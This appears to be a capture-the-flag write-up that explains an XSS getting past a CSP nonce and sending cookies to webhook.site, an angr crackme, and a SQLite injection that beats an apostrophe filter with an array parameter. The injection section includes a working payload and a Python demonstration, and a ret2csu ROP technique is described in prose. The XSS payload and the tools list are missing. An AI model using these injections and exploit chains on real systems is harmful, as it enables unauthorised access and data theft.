This competition was on 5 - 7 Feb 2021. We placed 157th / 1059.
HTML injected through the `name` GET parameter was rendered directly into the page, but script tags were not executed because of the site's CSP. The CSP used a fixed (non-rotating) nonce, so after I added that nonce to my injected script tag I had a working reflected XSS. Webhook.site is a site that logs the HTTP requests made to it, which I used to exfiltrate the secret cookie and ultimately the flag.
The complete payload was
Using angr, I found the execution state that reaches the "Correct!" output in the crackme; the input that drives the program into that state was the flag. Read more at https://docs.angr.io/core-concepts/pathgroups
After reading the source, this appears to be a SQLite injection with an apostrophe restriction. At first it seems impossible: SQLite does not treat a backslash as an escape character (an apostrophe inside a string literal is written as two apostrophes), so the MySQL-style trick of user: \ and pass:  OR 1=1; --
doesn't work, because the backslash is just a literal character and the quotes still pair up normally. Luckily, the backend JavaScript filters apostrophes with includes. On a string, includes does a substring search; on an array it looks for an element equal to the whole argument, so ["' OR 1=1;--"].includes("'") is false. Passing the password as an array (pass[]=...) therefore bypasses the apostrophe check, while the string interpolation that builds the query turns the one-element array back into its string.
user: admin
pass[]: ' OR 1=1;--
as GET parameters will grant you the flag.
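The filter bypass and the reason the backslash trick fails can be checked against a real SQLite database. The following is an added example, not code from the writeup or the challenge: the table, its contents and the flag value are constructed, and Python's `in` operator stands in for the backend's JavaScript `includes` (substring search on a string, element equality on an array), with `interpolate` modelling how a JS array stringifies when dropped into a template literal.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the challenge database (schema is assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT, pass TEXT, flag TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'hunter2', 'flag{constructed}')")
    return db


def apostrophe_filter_blocks(value):
    """Model of the backend's value.includes("'") check.

    Python's `in` behaves like JS includes here: on a str it is a substring
    search, on a list it is element equality. A one-element list whose element
    merely contains an apostrophe is therefore NOT blocked.
    """
    return "'" in value


def interpolate(value):
    """Model of JS `${value}` interpolation: an array joins its elements with commas."""
    if isinstance(value, list):
        return ",".join(value)
    return value


def login(db, user, password):
    """The vulnerable login as described: filter first, then string-build the SQL."""
    if apostrophe_filter_blocks(user) or apostrophe_filter_blocks(password):
        return "blocked", []
    query = (f"SELECT flag FROM users WHERE user='{interpolate(user)}' "
             f"AND pass='{interpolate(password)}'")
    return query, db.execute(query).fetchall()


def demo():
    db = make_db()
    # 1. MySQL-style backslash trick: SQLite has no backslash escape, so the
    #    quotes pair up normally, the query is well-formed and matches nothing.
    backslash = login(db, "\\", " OR 1=1;--")
    # 2. Apostrophe sent as a plain string: caught by the filter.
    plain = login(db, "admin", "' OR 1=1;--")
    # 3. pass[]=... : the array slips past includes(), then stringifies into the
    #    query, closing the literal and making the WHERE clause always true.
    array = login(db, "admin", ["' OR 1=1;--"])
    return {"backslash": backslash, "plain": plain, "array": array}


if __name__ == "__main__":
    for name, (query, rows) in demo().items():
        print(f"{name:>9}: {query!r} -> {rows}")
```

The `array` case builds `... AND pass='' OR 1=1;--'`, which SQLite accepts (the trailing `--'` is a comment) and which returns every row, flag included; the `backslash` case runs without error but returns nothing, which is exactly why the usual MySQL trick is a dead end here.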
I disassembled the binary with objdump -d babyrop -M intel. I noticed a large number of pops in __libc_csu_init, which is indicative of an abundance of ROP gadgets. ROP gadgets let one control register values by chaining short pieces of code that already exist in the binary, so no shellcode has to be injected and the stack never needs to be executable. Because of this observation, I suspected ret2csu would work against this binary.
I followed https://pwning.tech/2020/04/13/ret2csu/ a lot.
The premise is that __libc_csu_init contains a pair of gadgets that let one set three registers: rdi (its lower 32 bits, via edi), rsi and rdx. These are the first three argument registers of the x86-64 System V calling convention: when calling a function, the first argument goes in rdi, the second in rsi and the third in rdx (rcx, r8 and r9 follow). The second gadget then calls a function through a pointer held in r12, which can be a GOT entry. That is enough to call write, which takes three arguments (fd, buf, count; see man 2 write), with buf pointing at a GOT entry, so the program prints the resolved address of a libc function. The GOT holds the runtime addresses of functions imported from libc (the C standard library), and with ASLR those addresses change on every run. Leaking one GOT entry and subtracting that function's known offset within the target libc build yields the libc base, after which one can return to a one_gadget (an address in libc that spawns a shell on its own, subject to some register or stack constraints).
The complete "tools" I used in no particular order were: